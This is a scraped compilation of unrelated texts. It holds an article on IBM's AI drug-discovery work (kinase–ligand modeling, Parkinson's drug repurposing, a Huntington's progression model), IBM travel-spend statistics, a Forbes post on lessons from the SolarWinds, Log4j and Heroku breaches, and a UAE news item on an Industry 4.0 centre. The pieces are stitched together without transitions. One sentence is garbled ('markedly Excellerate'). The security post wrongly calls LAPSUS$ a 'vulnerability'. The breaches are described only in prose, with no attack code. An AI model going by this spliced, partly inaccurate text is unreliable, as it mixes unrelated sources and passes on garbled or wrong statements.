Proteochemometric modeling relies on the application of deep machine learning tools to determine the combined effect of target and ligand parameter changes on the target–ligand interaction. This bimodal approach is especially powerful for large classes of targets in which active-site similarities and lack of activity data for some of the proteins make the conventional discovery process extremely challenging.
Protein kinases are ubiquitous components of many cellular processes, and their modulation using inhibitors has greatly expanded the toolbox of treatment options for cancer, as well as neurodegenerative and viral diseases. Historically, however, only a small fraction of the kinome has been investigated for its therapeutic potential owing to biological and structural challenges.
Using deep machine learning algorithms, IBM researchers have developed a generative modeling approach to access large target–ligand interaction datasets and leverage the information to simultaneously predict activities for novel kinase–ligand combinations1. Importantly, their approach allowed the researchers to determine that reducing the kinase representation from the full protein sequence to just the active-site residues was sufficient to reliably drive their algorithm, introducing an additional time-saving, data-use optimization step.
Machine learning methods capable of handling multimodal datasets and of optimizing information use provide the tools for substantially accelerating NME discovery and harnessing the therapeutic potential of large and sometimes only minimally explored molecular target spaces.
Electronic health records (EHRs) and insurance claims contain a treasure trove of real-world data about the healthcare history, including medications, of millions of individuals. Such longitudinal datasets hold potential for identifying drugs that could be safely repurposed to treat certain progressive diseases not easily explored with conventional clinical-trial designs because of their long time horizons.
Turning observational medical databases into drug-repurposing engines requires the use of several enabling technologies, including machine learning-driven data extraction from unstructured sources and sophisticated causal inference modeling frameworks.
Parkinson’s disease (PD) is one of the most common neurodegenerative disorders in the world, affecting 1% of the population above 60 years of age. Within ten years of disease onset, an estimated 30–80% of PD patients develop dementia, a debilitating comorbidity that has made developing disease-modifying treatments to slow or stop its progression a high priority.
IBM researchers have now developed an AI-driven, causal inference framework designed to emulate phase 2 clinical trials to identify candidate drugs for repurposing, using real-world data from two PD patient cohorts totaling more than 195,000 individuals2. Extracting relevant data from EHRs and claims data, and using dementia onset as a proxy for evaluating PD progression, the team identified two drugs that significantly delayed progression: rasagiline, a drug already in use to treat motor symptoms in PD, and zolpidem, a known psycholeptic used to treat insomnia. Applying advanced causal inference algorithms, the IBM team was able to show that the drugs exert their effects through distinct mechanisms.
Using observational healthcare data to emulate otherwise costly, large and lengthy clinical trials to identify repurposing candidates highlights the potential for applying AI-based approaches to accelerate potential drug leads into prospective registration trials, especially in the context of late-onset progressive diseases for which disease-modifying therapeutic solutions are scarce.
One of the main bottlenecks in drug discovery is the high failure rate of clinical trials. Among the leading causes for this are shortcomings in identifying relevant patient populations and therapeutic endpoints owing to a fragmented understanding of disease progression.
Using unbiased machine-learning approaches to model large clinical datasets can advance the understanding of disease onset and progression, and help identify biomarkers for enhanced disease monitoring, prognosis, and trial enrichment that could lead to higher rates of trial success.
Huntington’s disease (HD) is an inherited neurodegenerative disease that results in severe motor, cognitive and psychiatric disorders and occurs in about 3 per 100,000 inhabitants worldwide. HD is a fatal condition, and no disease-modifying treatments have been developed to date.
An IBM team has now used a machine-learning approach to build a continuous dynamic probabilistic disease-progression model of HD from data aggregated from multiple disease registries3. Based on longitudinal motor, cognitive and functional measures, the researchers were able to identify nine disease states of clinical relevance, including some in the early stages of HD. Retrospective validation of the results with data from past and ongoing clinical studies showed the ability of the new disease-progression model of HD to provide clinically meaningful insights that are likely to markedly Excellerate patient stratification and endpoint definition.
Model-based determination of disease stages and relevant clinical and digital biomarkers that lead to better monitoring of disease progression in individual participants is key to optimizing trial design and boosting trial efficiency and success rates.
IBM has established its mission to advance the pace of discovery in healthcare and life sciences through the application of a versatile and configurable collection of accelerator and foundation technologies supported by a backbone of core technologies (Fig. 1). It recognizes that a successful campaign to accelerate discovery for therapeutics and biomarkers to address well-known pain points in the development pipeline requires external, domain-specific partners to co-develop, practice, and scale the concept of technology-based acceleration. The company has already established long-term commitments with strategic collaborators worldwide, including the recently launched joint Cleveland Clinic–IBM Discovery Accelerator, which will house the first private-sector, on-premises IBM Quantum System One in the United States. The program is designed to actively engage with universities, government, industry, startups and other relevant organizations, cultivating, supporting and empowering this community with open-source tools, datasets, technologies and educational resources to help break through long-standing bottlenecks in scientific discovery. IBM is engaging with biopharmaceutical enterprises that share this vision of accelerated discovery.
“Through partnerships with leaders in healthcare and life sciences worldwide, IBM intends to boost the potential of its next-generation technologies to make scientific discovery faster, and the scope of the discoveries larger than ever,” said Royyuru. “We ultimately see accelerated discovery as the core of our contribution to supercharging the scientific method.”
2019 U.S.-Booked Air Volume: $415 million
Primary U.S. Online Booking Tool: Concur
Primary U.S. Payment Supplier: American Express
Card Program: Individual Bill/Central Pay
Primary U.S. Expense Supplier: Concur
Primary U.S. Travel Risk Management Supplier: ISOS
Consolidated Global TMC: Amex GBT
Technology and business services giant IBM in 2019 all but held steady in terms of U.S.-booked air volume, spending about $2 million less year over year.
The company in 2019 deployed a cognitive analytics dashboard and offers it outside the company as well. IBM Travel Manager uses machine learning to help users gain program insight and inform a more dynamic airline and hotel sourcing approach that relies less on traditional requests for proposals. The company also for the first time in 2019 implemented and deployed hotel reshopping technology.
IBM in 2019 also refined its online booking strategy, insourcing Concur Travel's capabilities to manage a process staffed by IBM employees. About 88 percent of U.S.-booked tickets in 2019 were booked online through that channel, about 95 percent of those without agent assistance.
IBM at the end of 2019 had about 352,600 employees worldwide, about 2,000 more than at the end of 2018.
Meredith is the CEO of AutoRABIT, a leader in Salesforce.com DevSecOps and data protection for regulated industries.
Cybersecurity has become a top concern for businesses and organizations in regulated industries. The exposure of sensitive data can have wide-ranging impacts, including a failure to meet regulatory requirements, costly restoration processes, loss of customer confidence and more.
Potential sources for data breaches, exposures and loss are increasingly varied. Something as simple as an accidental deletion by a team member can be incredibly costly. A single minute of downtime resulting from data loss or corruption can cost a company millions of dollars.
Adequate preparation is the only way a business can avoid falling victim to the next high-profile data exposure event. And the best way to prepare for what’s coming next is to learn from the past. SolarWinds, Log4j and Heroku provide very useful context for preparing your environment for the next cyberattack.
Recent High-Profile Hacks
SolarWinds, Log4j and Heroku are just some of the recent high-profile attacks in the U.S., but the list continues. Spring4Shell and the LAPSUS$ vulnerability also wreaked havoc, further proving the urgent need for big companies to protect their customers’ data with the strongest data security measures possible.
The SolarWinds hack showed how easily a system could become compromised, even if an organization doesn’t directly experience a data breach. SolarWinds, a technology software firm, experienced a cyberattack in 2020. Due to the fact that SolarWinds was integrated with high-profile companies, the hack allowed attackers to access these companies’ systems, which included extremely sensitive areas of the U.S. government such as the Department for Homeland Security and the Treasury Department, according to Business Insider.
Apache announced a security issue with Log4j, a Java-based logging utility, in late 2021. Every internet-connected device that ran Log4j was susceptible to vulnerability, which was a huge problem for the top-tier companies that used it like Amazon, Oracle and IBM. This was the largest hack of its kind in over a decade.
The vulnerability allowed the execution of an arbitrary line of code by exploiting the Java Naming and Directory Interface (JNDI). Hackers introduced a single string to the log, allowing them to add their own lines of code. This gave them the potential ability to gain full control of a target’s system.
Heroku is a cloud platform as a service (PaaS) that experienced a cyberattack in April of this year. All users of this integration were potentially exposed, leading Heroku to require their users to reset their passwords.
OAuth tokens for GitHub integrations were exposed. From there, hackers may have been able to access the system at large and compromise a token for a Heroku machine account, creating the possibility of downloading data from private code repositories of some GitHub users on the Heroku platform.
Analyzing Your Current Strategy
A comprehensive overhaul of a data security strategy starts with first assessing the successes and potential vulnerabilities of current tools and procedures. Throughout this entire process, a safe, clean flow of feedback between every department and team is crucial.
An example process to identify potential vulnerabilities may include these six steps.
1. Identify protected data: Scan the system for any data or information that could prove damaging if exposed, such as PII (personally identifiable information), financial information and even certain types of metadata.
2. Audit permissions: Ninety-five percent of breaches are the result of human error. Make sure only those who need access to sensitive information have it.
3. Analyze entry points: Fortify login screens and link third-party accounts to cut off major access points for cybercriminals.
4. Communicate best practices: Strong passwords, knowing how to spot phishing attempts, only accessing company software with approved devices—actions such as these offer large degrees of protection.
5. Assess reporting capabilities: Documentation is essential for finding and stopping data security breaches. Ensure you have access to access logs, login history and other types of security reports.
6. Evaluate backup strategy: A reliable and fully functional data backup is critical after a data loss event. Ensure the backup strategy offers the protection you need.
To avoid being the next company to experience a major data loss, start preparing today. Securing your entry points, ensuring team members maintain mindful practices and employing intentional tools are considered by large companies today to be non-negotiable aspects of a data security plan.
It’s impossible to guess what the next huge cyberattack will be. The only thing we can do is put barriers in place to fortify our technical environments against bad actors.
Learning from previous breaches offers a glimpse into a possible future that we all want to avoid. Use these lessons as a guide to put a proper data security strategy in place and avoid costly and damaging attacks.
Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs and technology executives. Do I qualify?
The UAE Ministry of Industry and Advanced Technology (MoIAT) and EDGE have signed a memorandum of understanding (MoU) to establish the UAE’s first Industry 4.0 Enablement Centre.
The centre is aimed at promoting, enabling, and supporting the digital transformation and the adoption of Industry 4.0 technologies across the country’s manufacturing sector.
The Ministry and EDGE will explore how the Enablement Centre can leverage what has been achieved by the EDGE Learning & Innovation Factory (LIF), a state-of-the-art learning, innovation, and demonstration centre for Industry 4.0, operational excellence, and advanced technology. Its offerings include learning, innovation, and demonstration to the wider industrial ecosystem, said a statement.
The agreement was signed in the presence of Dr Sultan Al Jaber, UAE Minister of Industry and Advanced Technology; Sarah Al Amiri, Minister of State for Public Education and Advanced Technology; Faisal Al Bannai, Chairman of the Board of Directors, EDGE; and Mansour AlMulla, Managing Director & CEO, EDGE.
It was signed by Mohammed Al Qassim, Director of Technology Development and Adoption at Ministry of Industry and Advanced Technology; and Reda Nidhakou, Senior Vice President of Strategy & Portfolio Management, EDGE, at the EDGE Learning & Innovation Factory, located in Abu Dhabi.
Dr Al Jaber, Al Amiri, and Al Qasim were received by Faisal Al Bannai and Mansour AlMulla, at the EDGE Learning & Innovation Factory for a comprehensive tour of the facility, where key insights were highlighted on how organisations can enhance their operations by adopting the right processes and methodologies, how they can further enhance operations by adopting the right technologies, and how they can leverage automation to ignite a data-driven organisation.
EDGE LIF is an end-to-end automated and integrated factory that demonstrates digital manufacturing use cases to trainees. Each trainee will be able to participate in a simulation to explore how technology can empower production. In the simulation, trainees use an app to configure a small car, add a tagline, and track its production across the factory’s 4 islands in less than 7 minutes.
The Smart and Lean Production training at EDGE LIF is key to the Lean Digital curriculum. Lean Digital teaches how lead-times, quality and cost can be enhanced by the introduction of Industry 4.0 technologies.
The EDGE Learning & Innovation Factory SLF simulation is conducted over three rounds. It covers traditional production processes, mechanisms for discovering manufacturing and productivity challenges, and implementation of technological solutions that support operations. This includes digital work instructions and a dashboard of key performance indicators, which can lead to more advanced technical solutions, integrate automated work tasks, and mechanisms. These solutions include logistics smartwatches and barcode scanning smart gloves.
As part of this partnership, EDGE will host a series of initiatives, training courses, and programs at the facility from September this year with the aim of accelerating technology adoption in the industrial sector, enhancing collaboration within the UAE’s advanced technology ecosystem, and enabling the co-creation and development of innovative solutions among industry players.
The Industry 4.0 Enablement Centre will comprise various activities, including raising awareness around Industry 4.0 technologies and practices, upskilling manufacturers’ capabilities with specialised training curricula, demonstrating 4IR technology benefits, supporting the development of Industry 4.0 strategies, and creating a testbed and an open-access environment to pilot and co-develop innovative technologies.
EDGE is part of the Champions Network, a group of leading national industrial companies that deploy 4IR technologies and solutions in their operations. It includes companies such as Adnoc, Honeywell, Unilever, Schneider Electric, Emirates Global Aluminium (EGA), Cisco, Siemens, Aveva, SAP, Etisalat, IBM, Huawei, Strata, Microsoft, PTC, and Ericsson.
The Champions Network is a core pillar of UAE Industry 4.0 designed to accelerate the integration of 4IR solutions and applications across the UAE’s industrial sector, enhancing the UAE’s overall industrial competitiveness, driving down costs, increasing productivity and efficiency, enhancing quality, improving safety and creating new jobs.
MoIAT, EDGE, and Emirates Development Bank (EDB) signed a mutual agreement during the Make it in the Emirates Forum in June this year to support the development of manufacturing at EDGE, one of the world’s top 25 advanced technology groups for defence. Under the agreement, EDB will provide financing of up to AED1 billion to support EDGE Group’s effort to adopt advanced technology and manufacturing processes and will contribute to increasing its exports, supporting the growth of the national economy. MoIAT will provide EDGE with a robust roadmap which will reinforce the Group’s position as one of the world’s leading and most financially sound suppliers of military hardware and technology. - TradeArabia News Service